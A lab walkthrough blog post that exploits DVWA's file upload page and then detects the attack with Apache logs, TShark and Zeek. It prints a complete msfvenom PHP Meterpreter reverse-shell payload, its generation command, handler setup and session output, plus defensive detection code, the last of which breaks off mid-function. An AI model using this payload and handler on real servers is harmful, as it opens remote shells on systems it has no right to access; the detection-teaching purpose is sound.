Tuesday, December 12, 2023

Beginning Nikto - File Upload Vulnerability testing

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.

From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.


The Hack - Beginning Nikto - File Upload Vulnerability testing

Trying a different scan by providing the entire URL

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_0]
└─$ nikto -host http://10.0.0.106/dvwa/vulnerabilities/upload/ -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 0

Nothing much changed from what you saw in the earlier posts, so in this case I'm transitioning to manual exploitation of the file upload vulnerability.

Visit the file upload page within DVWA.

Open the browser "Web Developer Tools" and select the "Network" tab. 

Upload the file via the web application and we see the file successfully uploaded.


The upload also confirms the location the file was uploaded to: "./../hackable/uploads/hack_and_detect.png succesfully uploaded!". The ../ prefix means the path is relative to the upload page's directory, so the file was written into a directory two levels above it.

Revisiting the "Web Developer Tools", extracting a few lines of interest. First from the request:

Headers tab:
	scheme: http
	host: 10.0.0.106
	filename: /dvwa/vulnerabilities/upload/


Request tab:
	-----------------------------12554550258851086011705289877
	Content-Disposition: form-data; name="MAX_FILE_SIZE"

	100000
	-----------------------------12554550258851086011705289877
	Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
	Content-Type: image/png

	‰PNG
	
	...
	0çJ3ÄÉæ}›6œý×
	...
	-----------------------------12554550258851086011705289877
	Content-Disposition: form-data; name="Upload"

	Upload
	-----------------------------12554550258851086011705289877--


Looking at "Response" tab:

../../hackable/uploads/hack_and_detect.png succesfully uploaded!
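The request body above is standard multipart/form-data: a boundary string separates the form fields, and the file part carries a client-chosen filename and Content-Type. DVWA at the "low" level trusts both. The following is an added example, not code from the post or from DVWA, showing what a server-side check of such a body would look like: it parses the parts, then validates the file part against an extension allowlist, compares the declared Content-Type with the file's leading magic bytes, and scans the content for PHP open tags. The allowlist, the sample bodies and the build_body helper are constructed for this example; the boundary value is the one from the post's capture.

```python
import re

# Allowed upload types for this example: extension -> (declared Content-Type, leading magic bytes).
# Constructed allowlist; a real application would carry its own.
ALLOWED = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
}
# PHP open tags (<?php or <?=) anywhere in the content, which no image should contain.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def _header_params(value):
    """'form-data; name="x"; filename="y"' -> {'name': 'x', 'filename': 'y'}"""
    params = {}
    for item in value.split(";")[1:]:
        key, _, val = item.strip().partition("=")
        params[key.lower()] = val.strip('"')
    return params


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into parts (the layout captured in the post)."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:        # [0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):            # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):             # the CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, val = line.partition(":")
            headers[key.strip().lower()] = val.strip()
        disp = _header_params(headers.get("content-disposition", ""))
        parts.append({"name": disp.get("name"), "filename": disp.get("filename"),
                      "content_type": headers.get("content-type"), "data": data})
    return parts


def validate_upload(part):
    """Return the reasons a file part should be rejected; an empty list means it passes."""
    reasons = []
    filename = part["filename"] or ""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]   # never trust client-supplied directories
    if base != filename:
        reasons.append("filename contains path separators")
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        reasons.append(f"extension {ext!r} not allowed")
    else:
        declared, magic = ALLOWED[ext]
        if (part["content_type"] or "").lower() != declared:
            reasons.append(f"declared Content-Type {part['content_type']!r} is not {declared}")
        if not part["data"].startswith(magic):
            reasons.append(f"content does not start with {declared} magic bytes")
    if PHP_TAG.search(part["data"]):
        reasons.append("PHP open tag in content")
    return reasons


def check_upload_request(content_type_header, body):
    """Map each file part's filename to its rejection reasons."""
    boundary = _header_params(content_type_header)["boundary"]
    return {p["filename"]: validate_upload(p)
            for p in parse_multipart(body, boundary) if p["filename"] is not None}


# Constructed request bodies laid out like the DVWA form captured in the post
# (MAX_FILE_SIZE, uploaded, Upload); the boundary value is the one from the post's capture.
BOUNDARY = "---------------------------40506030756611040921021496595"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_body(filename, ctype, data):
    d = ("--" + BOUNDARY).encode()
    return (d + b'\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n'
            + d + b'\r\nContent-Disposition: form-data; name="uploaded"; filename="'
            + filename.encode() + b'"\r\nContent-Type: ' + ctype.encode() + b'\r\n\r\n' + data + b'\r\n'
            + d + b'\r\nContent-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n'
            + d + b'--\r\n')


PNG_BODY = build_body("hack_and_detect.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
PHP_BODY = build_body("malicious.php", "application/x-php", b"/*<?php /**/ error_reporting(0); /* ... */")
DISGUISED_BODY = build_body("shell.png", "image/png", b"<?php /* constructed placeholder */ ?>")

if __name__ == "__main__":
    for body in (PNG_BODY, PHP_BODY, DISGUISED_BODY):
        print(check_upload_request(CONTENT_TYPE, body))
```

The PNG body passes, the .php body fails on its extension and its content, and the third body shows why the extension and Content-Type checks alone are not enough: it claims to be a PNG but does not start with the PNG magic bytes and contains a PHP tag. Rejecting on content, not just on the name the client chose, is the check DVWA's "low" level omits.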

With this in place, can we use curl to get this file?

┌──(kali㉿securitynik)-[~/file_upload]
└─$ curl --request GET "http://10.0.0.106/dvwa/hackable/uploads/hack_and_detect.png" --output /tmp/hack_and_detect.png
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 64493  100 64493    0     0  7641k      0 --:--:-- --:--:-- --:--:-- 7872k

Verify the file was downloaded and its size:

┌──(kali㉿securitynik)-[~/file_upload]
└─$ ls /tmp/hack_and_detect.png  -l
-rw-r--r-- 1 kali kali 64493 Jun 22 15:25 /tmp/hack_and_detect.png

Open the file with "feh"


With confirmation that the file is in place, this means we may be able to upload other files.

Leveraging msfvenom to create a malicious PHP file.

┌──(kali㉿securitynik)-[/tmp]
└─$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.108 LPORT=9999 --format raw --out malicious.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
Saved as: malicious.php

View the created code

┌──(kali㉿securitynik)-[/tmp]
└─$ cat malicious.php 
/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Upload the malicious .php file, using the same process we did for the other files.

Set up a resource file that configures the multi/handler, to be loaded with msfconsole.

┌──(kali㉿securitynik)-[~]
└─$ cat dvwa.rc 
#File Upload Vulnerability
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.0.0.108
set LPORT 9999
exploit

Load up the resource file with msfconsole

┌──(kali㉿securitynik)-[~]
└─$ msfconsole --quiet --resource dvwa.rc 
[*] Processing dvwa.rc for ERB directives.
resource (dvwa.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (dvwa.rc)> set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
resource (dvwa.rc)> set LHOST 10.0.0.108
LHOST => 10.0.0.108
resource (dvwa.rc)> set LPORT 9999
LPORT => 9999
resource (dvwa.rc)> exploit
[*] Started reverse TCP handler on 10.0.0.108:9999 

Use curl to access the malicious.php file.

┌──(kali㉿securitynik)-[~]
└─$ curl --request GET http://10.0.0.106/dvwa/hackable/uploads/malicious.php

At this point, curl hangs and the MSF handler opens a session.

[*] Sending stage (39927 bytes) to 10.0.0.106
[*] Meterpreter session 1 opened (10.0.0.108:9999 -> 10.0.0.106:49786) at 2023-06-22 15:29:04 -0400

Validate we have successfully gained access to the system.

meterpreter > sysinfo 
Computer    : NIK-WIN-10
OS          : Windows NT NIK-WIN-10 10.0 build 19044 (Windows 10) AMD64
Meterpreter : php/windows

While we can do more, there is no need for this at this point. Objective achieved!

Exit Meterpreter:

meterpreter > exit -j
[*] Shutting down Meterpreter...

Transitioning to log analysis.

Detect - Log Analysis

Looking at the HTTP access.log file, there is nothing standing out here. Realistically, the only question to be asked is whether files should have been accessible from "/dvwa/hackable/uploads". Other than that, there is nothing here that stands out to me to suggest there was a problem.

10.0.0.108 - - [22/Jun/2023:15:23:33 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4061 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
10.0.0.108 - - [22/Jun/2023:15:24:42 -0400] "GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1" 200 64493 "-" "curl/7.88.1"
10.0.0.108 - - [22/Jun/2023:15:26:45 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4055 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
10.0.0.108 - - [22/Jun/2023:15:28:29 -0400] "GET /dvwa/hackable/uploads/malicious.php HTTP/1.1" 200 2 "-" "curl/7.88.1"
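The access.log lines are unremarkable one at a time, but two things in them can be checked mechanically: a request for a server-side script under the upload directory, and a client fetching from that directory shortly after POSTing to the upload form. The following is an added example, not from the post, that parses Apache combined-format lines and applies both checks. The upload form path, the upload directory and the script-extension list are taken from what the post shows; the severity labels are constructed. Note the path normalization: the post's own GET used /dvwa//hackable/..., which a plain prefix match on the raw path would miss.

```python
import posixpath
import re
from collections import defaultdict

# Apache "combined" log format, which the access.log lines in the post use.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

UPLOAD_FORM = "/dvwa/vulnerabilities/upload"   # the upload endpoint seen in the post
UPLOAD_DIR = "/dvwa/hackable/uploads/"          # where the post's response says files land
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".php5", ".cgi", ".pl", ".jsp", ".asp", ".aspx"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # Normalise the way the server resolves paths: drop the query string,
    # collapse "//" and resolve "..". Without this, /dvwa//hackable/... is missed.
    rec["path"] = posixpath.normpath(rec["path"].split("?", 1)[0])
    return rec


def find_upload_abuse(lines):
    """Return findings for script requests from, and post-upload fetches of, the upload directory."""
    findings = []
    uploads_by_ip = defaultdict(int)       # successful POSTs to the upload form, per client
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_FORM and rec["status"] == "200":
            uploads_by_ip[rec["ip"]] += 1
            continue
        if not rec["path"].startswith(UPLOAD_DIR):
            continue
        ext = posixpath.splitext(rec["path"])[1].lower()
        if ext in SCRIPT_EXTS:
            findings.append({"severity": "high", "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                             "status": rec["status"], "prior_uploads": uploads_by_ip[rec["ip"]],
                             "reason": "server-side script requested from the upload directory"})
        elif uploads_by_ip[rec["ip"]]:
            findings.append({"severity": "info", "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                             "status": rec["status"], "prior_uploads": uploads_by_ip[rec["ip"]],
                             "reason": "client fetched a file from the upload directory after uploading"})
    return findings


# The four access.log lines from the post, used here as sample input.
SAMPLE_LOG = r'''
10.0.0.108 - - [22/Jun/2023:15:23:33 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4061 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
10.0.0.108 - - [22/Jun/2023:15:24:42 -0400] "GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1" 200 64493 "-" "curl/7.88.1"
10.0.0.108 - - [22/Jun/2023:15:26:45 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4055 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
10.0.0.108 - - [22/Jun/2023:15:28:29 -0400] "GET /dvwa/hackable/uploads/malicious.php HTTP/1.1" 200 2 "-" "curl/7.88.1"
'''.strip().splitlines()

if __name__ == "__main__":
    for f in find_upload_abuse(SAMPLE_LOG):
        print(f["severity"], f["ts"], f["path"], "-", f["reason"])
```

Run over the four lines, the PNG fetch is reported as informational (the same client had just uploaded) and the malicious.php request as high severity, with two prior uploads from that client. The 200 status with a 2-byte response on the .php request is what server-side execution of the upload looks like in the log, as opposed to the file being served as-is.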

Transitioning to packet analysis

Detect - Packet Analysis

Set up for packet analysis: capture packets on ports 80, 443 or 9999.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -w ./file_upload.pcap -f 'tcp port(80 or 443 or 9999)' --interface eth0                                           
Capturing on 'eth0'
 ** (tshark:213735) 14:10:39.726904 [Main MESSAGE] -- Capture started.
 ** (tshark:213735) 14:10:39.726964 [Main MESSAGE] -- File: "./file_upload.pcap"

Analyzing the PCAP. No need to go through the entire process, as a lot of the heavy lifting was done in the earlier posts; this builds on that.

How many unique streams/sessions do we have in this PCAP?

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -T fields -e tcp.stream | sort --unique | wc --lines
5

With 5 streams, we should be able to quickly analyze these. Starting with stream 0.

Looking at the first 30 lines of the reassembled TCP stream.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | head --lines=30

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.108:55686
Node 1: 10.0.0.106:80
1460
POST /dvwa/vulnerabilities/upload/ HTTP/1.1
Host: 10.0.0.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------40506030756611040921021496595
Content-Length: 64966
Origin: http://10.0.0.106
Connection: keep-alive
Referer: http://10.0.0.106/dvwa/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf
Upgrade-Insecure-Requests: 1

-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
Content-Type: image/png

.PNG

Above we see the uploaded file has the name "hack_and_detect.png" and is a PNG image, as can be seen from "Content-Type: image/png".

Was this file upload successful? Looking for any report of the file name being successfully uploaded.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | grep "hack_and_detect"
Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
..<pre>../../hackable/uploads/hack_and_detect.png succesfully uploaded!</pre>

Let's see what is in stream 1.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,1 | head --lines=25

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 1
Node 0: 10.0.0.108:55814
Node 1: 10.0.0.106:80
116
GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*


        1460
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:24:42 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 22 Jun 2023 19:23:33 GMT
ETag: "fbed-5febcd1f850e8"
Accept-Ranges: bytes
Content-Length: 64493
Content-Type: image/png

.PNG

The above looks like a request for the same image that was previously uploaded.

Looking at stream 2.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | head --lines=33

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 2
Node 0: 10.0.0.108:47986
Node 1: 10.0.0.106:80
1460
POST /dvwa/vulnerabilities/upload/ HTTP/1.1
Host: 10.0.0.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3215483674970812347988844840
Content-Length: 1582
Origin: http://10.0.0.106
Connection: keep-alive
Referer: http://10.0.0.106/dvwa/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf
Upgrade-Insecure-Requests: 1

-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="uploaded"; filename="malicious.php"
Content-Type: application/x-php

/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_ty
752
pe) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------3215483674970812347988844840

There we see a PHP file was uploaded. Was the upload successful?

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | grep "malicious.php"
Content-Disposition: form-data; name="uploaded"; filename="malicious.php"
..<pre>../../hackable/uploads/malicious.php succesfully uploaded!</pre>

Yes it was. Moving on to stream 3.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,3 

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 3
Node 0: 10.0.0.108:33048
Node 1: 10.0.0.106:80
109
GET /dvwa/hackable/uploads/malicious.php HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*


        214
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:28:29 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

2
/*

        5
0


===================================================================

Stream 3 is just the curl request for the malicious.php file, with little detail inside the response. Very interesting.

Looking at stream 4.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | more                                                                    

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 4
Node 0: 10.0.0.106:49786
Node 1: 10.0.0.108:9999
        4
....
        1460
/*<?php /**/





if (!isset($GLOBALS['channels'])) {
  $GLOBALS['channels'] = array();
}
....

We see something here to do with PHP. Looking further into the payload, we ultimately see:

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | grep meter
my_print("Evaling main meterpreter stage");

That's a big clue that we have a real problem here on port 9999.

At this point, we know there are a number of files within these HTTP sessions. Fortunately, TShark can extract content from HTTP so we don't have to manually attempt to carve any of these. Let's extract those files with TShark.

Looking at the help, we see the TShark --export-objects usage.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark --export-objects --help 
tshark: "--export-objects" are specified as: <protocol>,<destdir>
tshark: The available export object types for the "--export-objects" option are:
     dicom
     ftp-data
     http
     imf
     smb
     tftp

Exporting from HTTP.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q --export-objects http,./exported-contents/

Looking at the exported contents we see:

┌──(kali㉿securitynik)-[~/file_upload]
└─$ ls -l exported-contents/
total 144
-rw-r--r-- 1 kali kali 64493 Jun 23 08:31  hack_and_detect.png
-rw-r--r-- 1 kali kali     2 Jun 23 08:31  malicious.php
-rw-r--r-- 1 kali kali 64966 Jun 23 08:31  upload
-rw-r--r-- 1 kali kali  4061 Jun 23 08:31 'upload(1)'
-rw-r--r-- 1 kali kali  1582 Jun 23 08:31 'upload(2)'
-rw-r--r-- 1 kali kali  4055 Jun 23 08:31 'upload(3)'

Confirming the files using the file command.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ file exported-contents/*
exported-contents/hack_and_detect.png: PNG image data, 178 x 127, 8-bit/color RGBA, non-interlaced
exported-contents/malicious.php:       ASCII text, with no line terminators
exported-contents/upload:              data
exported-contents/upload(1):           HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators
exported-contents/upload(2):           ASCII text, with very long lines (1111), with CRLF line terminators
exported-contents/upload(3):           HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators

At this point, you can analyze the files as needed. I will transition to Zeek to see what it saw.

Detect - Zeek Analysis

Set up Zeek

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

Focusing on the indicators of compromise, "hack_and_detect.png" and "malicious.php". First, "hack_and_detect.png":

└─$ cat http.log | grep --perl-regexp "hack_and_detect"                                                                              
1687461839.117382       CcgONKdzshQp8ZH68       10.0.0.108      55686   10.0.0.106      80      1       POST    10.0.0.106      /dvwa/vulnerabilities/upload/        http://10.0.0.106/dvwa/vulnerabilities/upload/  1.1     Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0       http://10.0.0.106       64966   4061    200     OK      -       -       (empty) -       -       -   F8D5nXnU24QCFs3ni,FL8pyG3KgVYBxGp5J8,FjahXg2bW4MO7TWJok  hack_and_detect.png     image/png       Fr5Uwyf1md9rma0F1       -       text/html
1687461900.287690       Ca15Kb1F57kcgJCx8j      10.0.0.108      55814   10.0.0.106      80      1       GET     10.0.0.106      /dvwa//hackable/uploads/hack_and_detect.png  -       1.1     curl/7.88.1     -       0       64493   200     OK      -       -       (empty)      -       -       -       -       -       -       FRXytH1roWzznSMp5d      -       image/png

Looking at malicious.php:

┌──(kali㉿securitynik)-[~/file_upload]                                                                                  
└─$ cat http.log | grep --perl-regexp "malicious.php"
1687462020.720561       C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      1       POST    10.0.0.106      /dvwa/vulnerabilities/upload/   http://10.0.0.106/dvwa/vulnerabilities/upload/    1.1     Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  http://10.0.0.106       1582    4055    200     OK      -       -       (empty) -       -       -       FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa  malicious.php   text/x-php      Fnwwck3gnEGZ79OWy1      -       text/html
1687462143.814819       CwNOXb1eZ6LvtPEI96      10.0.0.108      33048   10.0.0.106      80      1       GET     10.0.0.106      /dvwa/hackable/uploads/malicious.php    -       1.1     curl/7.88.1     -       0       2       200     OK      -       -       (empty) -       -       -       -       -       -       FVkDFy3Q20vdj9aPCk      -       -

Looking across the various logs for the UID "C9k6p6FxgHAgjfjGa" and removing the entries for files with 0 bytes, we get:

┌──(kali㉿securitynik)-[~/file_upload]
└─$ grep "C9k6p6FxgHAgjfjGa" *.log | grep --perl-regexp "1111|4055"                                                                                                                                                                                                                                       
files.log:1687462020.720573     F3m3sc1e7ZmJMAs5Cc      C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      HTTP    0       (empty) text/x-php      malicious.php   0.000000        -       T       1111    -       0       0       F       -       -       -       -       -       --
files.log:1687462020.751930     Fnwwck3gnEGZ79OWy1      C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      HTTP    0       (empty) text/html       -       0.000001        -       F       4055    4055    0       0       F       -       -       -       -       -       -       -
http.log:1687462020.720561      C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      1       POST    10.0.0.106      /dvwa/vulnerabilities/upload/   http://10.0.0.106/dvwa/vulnerabilities/upload/  1.1     Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  http://10.0.0.106 1582    4055    200     OK      -       -       (empty) -       -       -       FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa        malicious.php   text/x-php      Fnwwck3gnEGZ79OWy1      -       text/html

Obviously, there are entries in the conn.log file. However, the objective is to keep things simple for this analysis.
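The Zeek evidence above lives in two logs joined by identifiers: http.log carries the request with its orig_fuids, and files.log carries each transferred file, keyed by fuid, with the MIME type Zeek sniffed from the content (text/x-php here, even though the client declared application/x-php). The following is an added example, not from the post or from Zeek, that parses both logs from their #fields headers, flags POSTs whose uploaded file Zeek typed or named as a server-side script, joins them to files.log by fuid, and flags GETs for scripts under the upload directory. The sample rows are reconstructed from the post's output as tab-separated text; the field lists follow the column layout shown in the post, and the script MIME list and upload directory are assumptions for this example.

```python
import posixpath

# Column layouts matching the post's http.log and files.log output.
HTTP_FIELDS = ("ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer "
               "version user_agent origin request_body_len response_body_len status_code status_msg "
               "info_code info_msg tags username password proxied orig_fuids orig_filenames "
               "orig_mime_types resp_fuids resp_filenames resp_mime_types").split()
FILES_FIELDS = ("ts fuid uid id.orig_h id.orig_p id.resp_h id.resp_p source depth analyzers mime_type "
                "filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes "
                "timedout parent_fuid md5 sha1 sha256 extracted extracted_cutoff extracted_size").split()

SCRIPT_MIMES = {"text/x-php", "application/x-php", "application/x-httpd-php"}   # assumption
SCRIPT_EXTS = (".php", ".phtml", ".phar")
UPLOAD_DIR = "/dvwa/hackable/uploads/"          # where the post's upload response says files land


def parse_zeek_log(text):
    """Parse Zeek TSV text using its #fields header; returns one dict per record."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def find_script_uploads(http_text, files_text):
    """Correlate http.log and files.log: script uploads, and script requests from the upload dir."""
    files_by_fuid = {f["fuid"]: f for f in parse_zeek_log(files_text)}
    findings = []
    for h in parse_zeek_log(http_text):
        if h["method"] == "POST":
            mimes = set(h["orig_mime_types"].split(","))
            names = h["orig_filenames"].split(",")
            if mimes & SCRIPT_MIMES or any(n.lower().endswith(SCRIPT_EXTS) for n in names):
                # join back to files.log through the fuids Zeek recorded for the request body
                matched = [files_by_fuid[f] for f in h["orig_fuids"].split(",") if f in files_by_fuid]
                findings.append({"kind": "script_upload", "uid": h["uid"], "src": h["id.orig_h"],
                                 "filenames": names, "mime_types": sorted(mimes),
                                 "file_bytes": [int(f["seen_bytes"]) for f in matched]})
        elif h["method"] == "GET":
            path = posixpath.normpath(h["uri"].split("?", 1)[0])
            if path.startswith(UPLOAD_DIR) and path.lower().endswith(SCRIPT_EXTS):
                findings.append({"kind": "script_request", "uid": h["uid"], "src": h["id.orig_h"],
                                 "uri": path, "status": h["status_code"],
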